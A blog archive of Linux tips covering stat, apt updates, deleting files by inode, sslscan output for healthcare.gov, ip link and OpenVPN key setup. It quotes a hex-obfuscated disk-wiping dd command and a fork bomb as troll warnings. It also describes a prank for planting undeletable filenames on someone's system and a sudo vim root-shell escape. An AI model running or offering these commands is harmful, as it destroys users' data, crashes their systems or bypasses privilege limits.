Archive for the ‘Debian-Testing’ Category:

London underground signs powered by Linux.

London underground Linux displays.

This is a photograph of an information display in the London Underground. It is apparently running Linux: a file-system is missing, so when the system boots it cannot find the file-system, switches to runlevel 6 and reboots. Someone might have stolen a hard drive from the machine, which would leave the Linux machine unable to boot. So if you have a Linux machine, make sure physical access to the server is restricted to avoid security issues. This is yet another Linux sighting.

Using the Linux stat command to get information about a file.

The Linux stat command allows information to be shown about a file on your file-system.

jason@darknet:~/Documents$ stat /bin/ls
  File: ‘/bin/ls’
  Size: 118280    	Blocks: 232        IO Block: 4096   regular file
Device: 801h/2049d	Inode: 10616940    Links: 1
Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2016-02-01 08:55:40.145487505 +1100
Modify: 2015-03-15 02:47:04.000000000 +1100
Change: 2016-01-19 13:22:58.462724858 +1100
 Birth: -

The example above shows the size of the file, the access, change and modification times and inode information.

The -t parameter shows the information in terse form.

jason@darknet:~/Documents$ stat -t /bin/ls
/bin/ls 118280 232 81ed 0 0 801 10616940 1 0 0 1454277340 1426348024 1453170178 0 4096

Use the -f parameter to get information about the filesystem instead of a file.

jason@darknet:~/Documents$ stat -f /
  File: "/"
    ID: 5f5a0e0ff79afa26 Namelen: 255     Type: ext2/ext3
Block size: 4096       Fundamental block size: 4096
Blocks: Total: 112936344  Free: 111033927  Available: 105291323
Inodes: Total: 28696576   Free: 28486575

This is a very useful Linux command that returns useful filesystem information.

How to update packages on your Debian GNU/Linux system.

The packages on your Debian system must be kept up to date to ensure the security concerns are addressed. Use this command to install any pending updates.

sudo apt-get update; sudo apt-get upgrade

The Debian user may also use this command.

sudo aptitude update; sudo aptitude safe-upgrade

Both of these commands will update all of the software on a Debian system to the latest versions.

Website links changed.

I have changed the name of one of my categories on my website. If you cannot find an old post, please use the search function to find it again. I have to wait until Google indexes my site again.

Some awesome UNIX tricks. Create a file that is hard to delete.

Here is one for any experimenters out there…

It is possible to create files which simply cannot be deleted from the standard shell. To do this you will have to physically create the file using a script or a text editor, and you will have to use a sequence of control characters which cannot be typed from the shell. Try things like Ctrl-h (this is the code for the delete key). A file created with the file-name Ctrl-h would not be able to be deleted from the shell, unless you used wildcards. So, make it a nice long series of characters, so that to delete the file, the user has no choice but to individually copy all his files elsewhere, then delete everything in his directory, and then copy all his files back. This is one of my favorites… gets them every time!

The following script file is an example which will create a file with the name Ctrl-h. You MUST type this file in using the vi editor or similar. If you are not very good with vi, type “man vi” and print the help file; it even contains stuff that I find useful now and then.

Type the following in vi…

echo '' > 'a^h'

NOTE: to get the ^h (this really means Ctrl-h) in Vim, type:

Ctrl v
Ctrl h

The Ctrl-v instructs vi to take the next character as a literal ASCII character, and not to interpret it.

Change the access on the file you just created and now execute it. It will create a file which looks like it is called a, but try to delete it! Use wildcards if you really want to delete it.

List the inode numbers of files in a directory.

Use the ls -il command to list the inode numbers of files in a directory.

jason@ubuntu:~/Documents$ ls -il
total 20
405605 -rwxrwxr-x 1 jason jason 8920 Jan 11 15:29 a.out
405685 -rw-rw-r-- 1 jason jason  960 Jan 11 15:29 ip.c
405815 -rw-rw-r-- 1 jason jason 1279 Jan 11 15:22 my.c
405604 -rw-rw-r-- 1 jason jason    0 Jan 11 14:41 my.c~

Then use this command to delete the file by inode number.

find . -inum 405604 -exec rm -i {} \;

This is the best way to delete a file that has a strange file-name, just use the filesystem inode.

jason@ubuntu:~/Documents$ find . -inum 405604 -exec rm -i {} \;
rm: remove regular empty file ‘./my.c~’? y

So, if someone creates a file with a strange name, it can still be easily deleted.

Take this command, for example. It will create a file named -f.

jason@ubuntu:~/Documents$ echo "me" > "-f"

This is evil, but not the end of the world…

jason@ubuntu:~/Documents$ ls -iluh
total 24K
405605 -rwxrwxr-x 1 jason jason 8.8K Jan 11 15:29 a.out
406568 -rw-rw-r-- 1 jason jason    3 Jan 12 10:36 -f
405685 -rw-rw-r-- 1 jason jason  960 Jan 11 15:29 ip.c
405815 -rw-rw-r-- 1 jason jason 1.3K Jan 11 15:21 my.c

This file can still be deleted with this neat trick.

jason@ubuntu:~/Documents$ find . -inum 406568 -exec rm -i {} \;
rm: remove regular file ‘./-f’? y

An even more evil command…

jason@ubuntu:~/Documents$ touch "\+Xy \+\8"

This is still not a barrier. But these are good commands to know: some malicious user might use them on your system to create a file that you cannot delete, and it is good to know that these files can be removed easily with the right knowledge.
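The inode-based removal above, wrapped as a reusable check (an added example, not code from the original post). The function names, the temporary directory and the sample file names are constructed for illustration; the helper refuses to act when an inode number matches more than one name, which happens with hard links.

```shell
#!/bin/sh
# Added example: remove awkwardly named files by inode number.
# For a plain leading dash, "rm -- -f" or "rm ./-f" also works; the inode
# route covers names you cannot type at all.

# Print the inode number of a path. "--" ends option parsing, so a name that
# starts with "-" is never read as a flag.
inode_of() {
    ls -di -- "$1" | awk 'NR == 1 { print $1 }'
}

# Remove the single entry directly inside directory $1 whose inode is $2.
# -xdev keeps find on one filesystem (inode numbers are only unique per
# filesystem) and -maxdepth 1 stops it descending into subdirectories.
remove_by_inode() {
    rbi_dir=$1
    rbi_inum=$2
    # Emit one "x" per match and count bytes, which stays correct even when
    # a file name contains newlines.
    rbi_n=$(find "$rbi_dir" -xdev -maxdepth 1 -inum "$rbi_inum" \
                -exec printf x \; | wc -c | tr -d ' ')
    if [ "$rbi_n" -ne 1 ]; then
        echo "refusing: inode $rbi_inum matches $rbi_n names in $rbi_dir" >&2
        return 1
    fi
    # The post uses "rm -i" to confirm interactively; -f is used here only
    # because this demo runs unattended.
    find "$rbi_dir" -xdev -maxdepth 1 -inum "$rbi_inum" -exec rm -f -- {} \;
}

# Create three awkward names in a scratch directory, remove each one by
# inode, and print how many entries are left.
demo() {
    demo_tmp=$(mktemp -d) || return 1
    demo_bs=$(printf 'a\b')          # "a" followed by Ctrl-h (byte 0x08)
    # Constructed names modelled on the post: a control character,
    # a leading dash, and backslashes with a space.
    for demo_name in "$demo_bs" '-f' '\+Xy \+\8'; do
        : > "$demo_tmp/$demo_name" || return 1
    done
    for demo_name in "$demo_bs" '-f' '\+Xy \+\8'; do
        remove_by_inode "$demo_tmp" "$(inode_of "$demo_tmp/$demo_name")" || return 1
    done
    demo_left=$(find "$demo_tmp" -mindepth 1 | wc -l | tr -d ' ')
    rmdir "$demo_tmp" 2>/dev/null
    echo "$demo_left"
}

echo "entries left after cleanup: $(demo)"
```
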

Get SSL information from a website using sslscan.

The sslscan command for the Kali Linux penetration testing distribution is very useful for gaining an insight into the SSL configuration of a web site.

Here is example usage on healthcare.gov…

root@darknet:~# sslscan healthcare.gov
Version: 1.10.5-static
OpenSSL 1.0.2e-dev xx XXX xxxx
 
Testing SSL server healthcare.gov on port 443
 
  TLS renegotiation:
Secure session renegotiation supported
 
  TLS Compression:
Compression disabled
 
  Heartbleed:
TLS 1.0 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.2 not vulnerable to heartbleed
 
  Supported Server Cipher(s):
Accepted  TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  128 bits  AES128-SHA                   
Accepted  TLSv1.0  112 bits  DES-CBC3-SHA                 
Accepted  TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  128 bits  AES128-SHA                   
Accepted  TLSv1.1  112 bits  DES-CBC3-SHA                 
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384            
Accepted  TLSv1.2  256 bits  AES256-SHA256                
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256            
Accepted  TLSv1.2  128 bits  AES128-SHA256                
Accepted  TLSv1.2  128 bits  AES128-SHA                   
Accepted  TLSv1.2  112 bits  DES-CBC3-SHA                 
 
  Preferred Server Cipher(s):
TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
 
  SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength:    2048
 
Subject:  www.healthcare.gov
Altnames: DNS:aca.api.healthcare.gov, DNS:cciio.cms.gov, DNS:eidm.cms.gov, DNS:styleguide.healthcare.gov, DNS:reminder.healthcare.gov, DNS:geo.api.healthcare.gov, DNS:ahrcvo.cms.gov, DNS:calt.cms.gov, DNS:portal.cms.gov, DNS:confluence.cms.gov, DNS:maps.cms.gov, DNS:cicd.cms.gov, DNS:tmdsmdr.aws.healthcare.gov, DNS:www.errp.gov, DNS:assets.cms.gov, DNS:ci.cms.gov, DNS:downloads.cms.gov, DNS:partnershippledge.healthcare.gov, DNS:www.hospitalcompare.hhs.gov, DNS:marketplace.api.healthcare.gov, DNS:ratereview.healthcare.gov, DNS:wr.healthcare.gov, DNS:login.healthcare.gov, DNS:marketplace-int.api.healthcare.gov, DNS:monitor.healthcare.gov, DNS:www.cciio.cms.gov, DNS:ayudalocal.cuidadodesalud.gov, DNS:api.healthcare.gov, DNS:assets.healthcare.gov, DNS:www.stopmedicarefraud.gov, DNS:signup.healthcare.gov, DNS:billing.healthcare.gov, DNS:prodprime.cuidadodesalud.gov, DNS:splunk.cms.gov, DNS:localhelp.healthcare.gov, DNS:tmdsm.aws.healthcare.gov, DNS:hfpp.cms.gov, DNS:jira.cms.gov, DNS:stopmedicarefraud.gov, DNS:errp.gov, DNS:companyprofile.healthcare.gov, DNS:crowd.cms.gov, DNS:healthcare.gov, DNS:finder.healthcare.gov, DNS:marketplace.cms.gov, DNS:companyprofiles.healthcare.gov, DNS:nagios.healthcare.gov, DNS:ahrc.cms.gov, DNS:search.healthcare.gov, DNS:openpaymentsdata.cms.gov, DNS:prodprime.healthcare.gov, DNS:scclia.cms.gov, DNS:vpn.aws.healthcare.gov, DNS:hipchat.cms.gov, DNS:splunk.healthcare.gov, DNS:data.healthcare.gov, DNS:cuidadodesalud.gov, DNS:status.healthcare.gov, DNS:developer.cms.gov, DNS:eap.cms.gov, DNS:pcip.gov, DNS:github.cms.gov, DNS:api.finder.healthcare.gov, DNS:hospitalcompare.hhs.gov, DNS:go.healthcare.gov, DNS:search.stopmedicarefraud.gov, DNS:www.pcip.gov, DNS:www.cuidadodesalud.gov, DNS:www.healthcare.gov
Issuer:   GeoTrust SSL CA - G3

This shows some comprehensive information about the website SSL configuration.

To test only TLS ciphers, use this command line parameter.

root@darknet:~# sslscan --tlsall healthcare.gov
Version: 1.10.5-static
OpenSSL 1.0.2e-dev xx XXX xxxx
 
Testing SSL server healthcare.gov on port 443
 
  TLS renegotiation:
Secure session renegotiation supported
 
  TLS Compression:
Compression disabled
 
  Heartbleed:
TLS 1.0 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.2 not vulnerable to heartbleed
 
  Supported Server Cipher(s):
Accepted  TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  128 bits  AES128-SHA                   
Accepted  TLSv1.0  112 bits  DES-CBC3-SHA                 
Accepted  TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  128 bits  AES128-SHA                   
Accepted  TLSv1.1  112 bits  DES-CBC3-SHA                 
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384            
Accepted  TLSv1.2  256 bits  AES256-SHA256                
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256            
Accepted  TLSv1.2  128 bits  AES128-SHA256                
Accepted  TLSv1.2  128 bits  AES128-SHA                   
Accepted  TLSv1.2  112 bits  DES-CBC3-SHA                 
 
  Preferred Server Cipher(s):
TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
 
  SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength:    2048
 
Subject:  www.healthcare.gov
Altnames: DNS:aca.api.healthcare.gov, DNS:cciio.cms.gov, DNS:eidm.cms.gov, DNS:styleguide.healthcare.gov, DNS:reminder.healthcare.gov, DNS:geo.api.healthcare.gov, DNS:ahrcvo.cms.gov, DNS:calt.cms.gov, DNS:portal.cms.gov, DNS:confluence.cms.gov, DNS:maps.cms.gov, DNS:cicd.cms.gov, DNS:tmdsmdr.aws.healthcare.gov, DNS:www.errp.gov, DNS:assets.cms.gov, DNS:ci.cms.gov, DNS:downloads.cms.gov, DNS:partnershippledge.healthcare.gov, DNS:www.hospitalcompare.hhs.gov, DNS:marketplace.api.healthcare.gov, DNS:ratereview.healthcare.gov, DNS:wr.healthcare.gov, DNS:login.healthcare.gov, DNS:marketplace-int.api.healthcare.gov, DNS:monitor.healthcare.gov, DNS:www.cciio.cms.gov, DNS:ayudalocal.cuidadodesalud.gov, DNS:api.healthcare.gov, DNS:assets.healthcare.gov, DNS:www.stopmedicarefraud.gov, DNS:signup.healthcare.gov, DNS:billing.healthcare.gov, DNS:prodprime.cuidadodesalud.gov, DNS:splunk.cms.gov, DNS:localhelp.healthcare.gov, DNS:tmdsm.aws.healthcare.gov, DNS:hfpp.cms.gov, DNS:jira.cms.gov, DNS:stopmedicarefraud.gov, DNS:errp.gov, DNS:companyprofile.healthcare.gov, DNS:crowd.cms.gov, DNS:healthcare.gov, DNS:finder.healthcare.gov, DNS:marketplace.cms.gov, DNS:companyprofiles.healthcare.gov, DNS:nagios.healthcare.gov, DNS:ahrc.cms.gov, DNS:search.healthcare.gov, DNS:openpaymentsdata.cms.gov, DNS:prodprime.healthcare.gov, DNS:scclia.cms.gov, DNS:vpn.aws.healthcare.gov, DNS:hipchat.cms.gov, DNS:splunk.healthcare.gov, DNS:data.healthcare.gov, DNS:cuidadodesalud.gov, DNS:status.healthcare.gov, DNS:developer.cms.gov, DNS:eap.cms.gov, DNS:pcip.gov, DNS:github.cms.gov, DNS:api.finder.healthcare.gov, DNS:hospitalcompare.hhs.gov, DNS:go.healthcare.gov, DNS:search.stopmedicarefraud.gov, DNS:www.pcip.gov, DNS:www.cuidadodesalud.gov, DNS:www.healthcare.gov
Issuer:   GeoTrust SSL CA - G3

To ask for an OCSP Stapling Request, use this command.

root@darknet:~# sslscan --ocsp healthcare.gov

With the --ssl3 parameter, the user can check just for the sslv3 implementation.

root@darknet:~# sslscan --ssl3 healthcare.gov
Version: 1.10.5-static
OpenSSL 1.0.2e-dev xx XXX xxxx
 
Testing SSL server healthcare.gov on port 443
 
  TLS renegotiation:
Secure session renegotiation supported
 
  TLS Compression:
Compression disabled
 
  Heartbleed:
All TLS protocols disabled, cannot check for heartbleed.
 
  Supported Server Cipher(s):
 
  Preferred Server Cipher(s):
 
  SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength:    2048
 
Subject:  www.healthcare.gov
Altnames: DNS:aca.api.healthcare.gov, DNS:cciio.cms.gov, DNS:eidm.cms.gov, DNS:styleguide.healthcare.gov, DNS:reminder.healthcare.gov, DNS:geo.api.healthcare.gov, DNS:ahrcvo.cms.gov, DNS:calt.cms.gov, DNS:portal.cms.gov, DNS:confluence.cms.gov, DNS:maps.cms.gov, DNS:cicd.cms.gov, DNS:tmdsmdr.aws.healthcare.gov, DNS:www.errp.gov, DNS:assets.cms.gov, DNS:ci.cms.gov, DNS:downloads.cms.gov, DNS:partnershippledge.healthcare.gov, DNS:www.hospitalcompare.hhs.gov, DNS:marketplace.api.healthcare.gov, DNS:ratereview.healthcare.gov, DNS:wr.healthcare.gov, DNS:login.healthcare.gov, DNS:marketplace-int.api.healthcare.gov, DNS:monitor.healthcare.gov, DNS:www.cciio.cms.gov, DNS:ayudalocal.cuidadodesalud.gov, DNS:api.healthcare.gov, DNS:assets.healthcare.gov, DNS:www.stopmedicarefraud.gov, DNS:signup.healthcare.gov, DNS:billing.healthcare.gov, DNS:prodprime.cuidadodesalud.gov, DNS:splunk.cms.gov, DNS:localhelp.healthcare.gov, DNS:tmdsm.aws.healthcare.gov, DNS:hfpp.cms.gov, DNS:jira.cms.gov, DNS:stopmedicarefraud.gov, DNS:errp.gov, DNS:companyprofile.healthcare.gov, DNS:crowd.cms.gov, DNS:healthcare.gov, DNS:finder.healthcare.gov, DNS:marketplace.cms.gov, DNS:companyprofiles.healthcare.gov, DNS:nagios.healthcare.gov, DNS:ahrc.cms.gov, DNS:search.healthcare.gov, DNS:openpaymentsdata.cms.gov, DNS:prodprime.healthcare.gov, DNS:scclia.cms.gov, DNS:vpn.aws.healthcare.gov, DNS:hipchat.cms.gov, DNS:splunk.healthcare.gov, DNS:data.healthcare.gov, DNS:cuidadodesalud.gov, DNS:status.healthcare.gov, DNS:developer.cms.gov, DNS:eap.cms.gov, DNS:pcip.gov, DNS:github.cms.gov, DNS:api.finder.healthcare.gov, DNS:hospitalcompare.hhs.gov, DNS:go.healthcare.gov, DNS:search.stopmedicarefraud.gov, DNS:www.pcip.gov, DNS:www.cuidadodesalud.gov, DNS:www.healthcare.gov
Issuer:   GeoTrust SSL CA - G3

Type man sslscan for more information.
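One way to triage the "Accepted" lines of a scan like the ones above (an added example, not part of the original post or of sslscan itself). The function names and the reason labels are made up for illustration, the sample lines are copied from the output shown above, and the line format assumed is the sslscan 1.10.5 layout printed on this page.

```shell
#!/bin/sh
# Added example: flag cipher entries in sslscan output that deserve a
# second look from whoever maintains the server configuration.

# A subset of the "Accepted" lines from the scan output shown in the post.
sample_scan() {
cat <<'EOF'
Accepted  TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  112 bits  DES-CBC3-SHA
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384
Accepted  TLSv1.2  128 bits  AES128-SHA
Accepted  TLSv1.2  112 bits  DES-CBC3-SHA
EOF
}

# Read sslscan output on stdin and print one line per accepted cipher that
# trips a check: "<protocol> <cipher> <reason> [<reason> ...]".
#   legacy-protocol     SSLv2, SSLv3, TLS 1.0 or TLS 1.1
#   weak-cipher         DES/3DES, RC4, NULL, export or MD5 suites
#   short-key           fewer than 128 bits of key strength
#   no-forward-secrecy  key exchange is not (EC)DHE, so a stolen server key
#                       can decrypt recorded sessions
triage_sslscan() {
    awk '
    $1 == "Accepted" {
        proto  = $2
        bits   = $3 + 0
        cipher = $5
        why    = ""
        if (proto ~ /^(SSLv2|SSLv3|TLSv1\.0|TLSv1\.1)$/)
            why = why " legacy-protocol"
        if (cipher ~ /(DES|RC4|NULL|EXP|MD5)/)
            why = why " weak-cipher"
        if (bits < 128)
            why = why " short-key"
        # TLS 1.3 suite names carry no key-exchange prefix, so skip them here.
        if (proto != "TLSv1.3" && cipher !~ /^(ECDHE|DHE)-/)
            why = why " no-forward-secrecy"
        if (why != "")
            printf "%s %s%s\n", proto, cipher, why
    }'
}

# Stand-alone run over the embedded sample.
sample_scan | triage_sslscan
```

To check your own server, pipe a saved scan into the function instead of the sample, for example `sslscan example.org | triage_sslscan`, where example.org stands for a host you administer.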

Commands not to run on a Linux machine.

This is a good example of a command not to run on a Linux machine. This is commonly posted as a troll.

sudo $(echo "64642069663d2f6465762f7a65726f206f663d2f6465762f73646120636f756e743d3130302062733d314d0a" | xxd -r -p)

And this is what it actually does.

jason@ubuntu:~$ echo "64642069663d2f6465762f7a65726f206f663d2f6465762f73646120636f756e743d3130302062733d314d0a" | xxd -r -p
dd if=/dev/zero of=/dev/sda count=100 bs=1M

This will corrupt your hard drive and the Linux user will lose all of their data.

Here is another command that is commonly posted as a troll.

:(){ :|:& };:

This is a fork bomb; it will constantly spawn new processes until your system slows to a crawl. Always be careful of commands posted in less than reputable forums. If they are obfuscated like the xxd example, then do not run them, even if you are not using root or if you do not have sudo enabled.

There are trolls that tell people to delete System32 on Windows, but apparently this does not work as well as people think. The proper command will not even delete files as they are locked whilst Windows is running. The user would need to boot from a Linux live disc and then delete that Windows folder. So be careful when looking for help on websites like 4chan. They might give you something like this as a “helpful” post.

'Helpful' 4chan post.

How to use the ip command to bring down an interface on RHEL.

The ip command is a useful alternative to the ifconfig command and allows the user to manage network interfaces. This is a good way to use the command line to bring network interfaces up or down. In this example I am bringing the network interface down.

[root@localhost jason]# ip link set eno16777736 down
[root@localhost jason]# ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eno16777736: <BROADCAST,MULTICAST> mtu 1500 qdisc fq_codel state DOWN mode DEFAULT qlen 1000
    link/ether 00:0c:29:47:5e:b4 brd ff:ff:ff:ff:ff:ff
3: virbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN mode DEFAULT 
    link/ether 52:54:00:c1:70:73 brd ff:ff:ff:ff:ff:ff
4: virbr0-nic: <BROADCAST,MULTICAST> mtu 1500 qdisc fq_codel master virbr0 state DOWN mode DEFAULT qlen 500
    link/ether 52:54:00:c1:70:73 brd ff:ff:ff:ff:ff:ff

Now I bring the interface back up again.

[root@localhost jason]# ip link set eno16777736 up
[root@localhost jason]# ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eno16777736: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT qlen 1000
    link/ether 00:0c:29:47:5e:b4 brd ff:ff:ff:ff:ff:ff
3: virbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN mode DEFAULT 
    link/ether 52:54:00:c1:70:73 brd ff:ff:ff:ff:ff:ff
4: virbr0-nic: <BROADCAST,MULTICAST> mtu 1500 qdisc fq_codel master virbr0 state DOWN mode DEFAULT qlen 500
    link/ether 52:54:00:c1:70:73 brd ff:ff:ff:ff:ff:ff

The ip link show command will print information about the network interfaces.

ubuntu ~ $ ip link show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000
    link/ether 06:d6:3a:a8:82:13 brd ff:ff:ff:ff:ff:ff
3: tun1194: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 100
    link/none

The command ip addr show dev eth0 will only show IP address information for the interface supplied; in this case it is eth0.

ubuntu ~ $ ip addr show dev eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 06:d6:3a:a8:82:13 brd ff:ff:ff:ff:ff:ff
    inet 172.31.20.16/20 brd 172.31.31.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::4d6:3aff:fea8:8213/64 scope link
       valid_lft forever preferred_lft forever

This command will display IP multicast addresses for a particular interface.

ubuntu ~ $ ip maddr show dev eth0
2:      eth0
        link  01:00:5e:00:00:01
        link  33:33:00:00:00:01
        link  33:33:ff:a8:82:13
        inet  224.0.0.1
        inet6 ff02::1:ffa8:8213
        inet6 ff02::1
        inet6 ff01::1

I found this information on this useful ip command cheat-sheet from Redhat: https://access.redhat.com/sites/default/files/attachments/rh_ip_command_cheatsheet_1214_jcs_print.pdf.

How to get an OpenVPN server working on Ubuntu 14.04.

This site, [openvpn.net], has a good guide to setting up an OpenVPN server on a Linux machine. I used this guide as the other guides online are not as good and often do not lead to a satisfactory result.

I am using one on Linux and I can connect to it on my Windows machine and get an IP of 10.8.0.6.

Connected to my VPN and getting an IP address.

Set this option to 1 to ensure that packet forwarding is enabled on the system. This would be desired for our VPN connection.

# Enables packet forwarding (1 = enabled, 0 = disabled)
net.ipv4.ip_forward = 1

Copy all of your keys onto your Windows machine into a new folder and then run CMD as an Administrator. Then type openvpn client.conf to attempt to run the client configuration and connect to your VPN. If you are successful, you will see the output in the screenshot above. Type ipconfig to check that you are getting a proper IP address. This is easy when you are following a proper tutorial and the keys are properly generated. The best way to create a Virtual Private Network is to use 2048-bit keys instead of 1024-bit. This will greatly increase security. And do not use a PPTP VPN; this is not as secure.

To create VPN keys quickly, type sudo apt-get install easy-rsa openvpn.

Then copy the /usr/share/doc/openvpn/examples/easy-rsa directory to your home directory. This contains the scripts necessary to create a useful VPN configuration.

To ensure the consistent use of values when generating the Public Key Infrastructure, set the default values to be used by the PKI generating scripts. Edit ~/easy-rsa/vars and set these values at a minimum.

  • KEY_COUNTRY
  • KEY_PROVINCE
  • KEY_CITY
  • KEY_ORG
  • KEY_EMAIL

Another thing to check is that you are using 2048 bit encryption. Set this option in vars as well.

# Increase this to 2048 if you
# are paranoid.  This will slow
# down TLS negotiation performance
# as well as the one-time DH parms
# generation process.
export KEY_SIZE=2048

Once this is complete, load the values.

source ./vars

And then remove any previously generated certificates.

./clean-all

Then generate the Certificate Authority (CA) certificate with this command.

./build-ca

Build a server key with this command, where foobar is your server hostname. Do not enter a challenge password or company name when the script prompts you for one. This will cause much heartache later.

./build-key-server foobar

Now generate the Diffie-Hellman parameters .pem file needed by the server.

./build-dh

Now build a key for the client computer to use when connecting to your OpenVPN server.

./build-key mycomputer1

Now you can copy these keys to the client computer and test the connection. There is some information about routed lans on this page: https://community.openvpn.net/openvpn/wiki/RoutedLans. This will help when setting up routing for your VPN.

Rosehosting also offers a simple OpenVPN installation script for creating a new OpenVPN instance on Ubuntu and getting a new user created.

View it here: https://www.rosehosting.com/blog/openvpn-setup-script-for-debian-and-ubuntu/.

The best tutorial I found to install FreePBX on Ubuntu 14.04 LTS server.

This is the best tutorial I have found that allowed me to install FreePBX on an Ubuntu 14.04 instance on an Amazon AWS instance. I tried a few and this one really did work for me after following all of the steps and exercising patience.

http://wiki.freepbx.org/display/HTGS/Installing+FreePBX+12+on+Ubuntu+Server+14.04+LTS.

FreePBX is a very useful tool for setting up a free VOIP system for cheap telephony over the Internet. But it must be installed from source so that everything works well together. The only PPA I could find was for Ubuntu Hardy and this is obviously far too old to be practical or secure.

Some miscellaneous Linux tips for Ubuntu and Linux Mint users.

If you are starting Firefox from a terminal window where you have specified the proxy settings, and you have the use system proxy settings option ticked, you will not need to set the proxy within Firefox. That is a very cool tip indeed.

If you need to set the proxy before using apt, you will not be successful when you type sudo apt-get install foo. Type sudo su - and then specify the required proxy settings so it will be picked up by apt.

I installed Ubuntu from the minimal installation ISO for Ubuntu 14.04 and I did not get the proper resolution for the virtual consoles and Xorg. I fixed this by editing the /etc/default/grub file and specifying the resolution there.

Uncomment this line and set the desired resolution. This fixed my issue.


GRUB_GFXMODE=1366x768

Another way to run a command as the root user using su-to-root.


homer@ubuntu:~$ su-to-root -c ls
About to execute ls.
This command needs root privileges to be executed.
Using sudo...
Enter homer password at prompt.
Desktop Documents Downloads

How to install kernel headers for your currently installed kernel. Using backticks makes this very easy: you may embed the output of a command into a one-liner.


homer@ubuntu:~$ sudo apt-get install linux-headers-`uname -r`
Reading package lists... Done
Building dependency tree
Reading state information... Done
linux-headers-3.13.0-32-generic is already the newest version.
linux-headers-3.13.0-32-generic set to manually installed.
0 to upgrade, 0 to newly install, 0 to remove and 0 not to upgrade.

Another way to get a root shell using VIM and sudo.

Type sudo vim foo.txt to open a text file named foo.txt as the superuser.

Now, in command mode, type :!/bin/sh and hit ENTER. This will give you a root prompt that you may use to enter and run any command that you wish. Very cool exploit indeed. I found this here: http://www.computersecuritystudent.com/UNIX/SUDO/lesson1/.

There is more information about sudo exploits here: http://www.vnsecurity.net/2012/02/exploiting-sudo-format-string-vunerability/.

